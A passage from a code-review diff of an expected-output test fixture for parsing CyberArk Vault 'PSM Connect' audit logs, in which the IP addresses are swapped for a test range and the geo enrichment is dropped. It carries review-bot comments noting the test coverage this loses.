07:08:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating 
System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1829,15 +1599,15 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "7db90436-8a1a-4203-9a96-65137625ab2d", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1850,9 +1620,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 07:08:28", "desc": "PSM Connect" 
@@ -1863,8 +1633,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936301800Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:28\",\"IsoTimestamp\":\"2021-03-15T14:08:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331207100Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:28\",\"IsoTimestamp\":\"2021-03-15T14:08:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", 
@@ -1887,39 +1657,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1936,7 +1685,7 @@ }, "@timestamp": "2021-03-15T14:11:09.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
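Review bot: The regenerated expectation removes `source.geo` and `destination.geo` outright instead of replacing them with geo data for the new addresses, which looks like the opposite of what moving to the supported test subset is meant to achieve. If 67.43.156.0/24 is covered by the GeoIP database bundled for pipeline tests, the next regeneration on a stack with that database loaded will re-add `geo` blocks and this fixture will fail; if the test stack is not expected to enrich at all, the `source.geo`/`destination.geo` mapping is now exercised by nothing in this file. Worth confirming which of the two holds before merging, and regenerating with the test GeoIP database available if it is the former. Note also that `source.ip` (67.43.156.13) and `destination.ip` (67.43.156.15) now sit in the same /24, so the old fixture's property of source and destination resolving to different countries is gone either way.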
@@ -1947,16 +1696,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:11:09Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating 
System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1968,15 +1716,15 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1989,9 +1737,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 07:11:09", "desc": "PSM Connect" 
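Review bot: `related.ip` shrinks from three entries to two because the Station value was rewritten to the same address as DstHost (67.43.156.15), so this fixture no longer covers the case where the PSM station is a different host from the target. A regression that stopped adding `station` to `related.ip` would still pass against this expected output. Using a third address from the supported subset for Station in the input log (e.g. `67.43.156.14`, assuming the whole 67.43.156.0/24 range is supported) and regenerating would keep that coverage. The same collapse appears in the preceding events of this file, where `station` and `dst_host` are now identical.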
@@ -2002,8 +1750,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936304600Z", - "original": "\u003c5\u003e1 2021-03-15T14:11:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 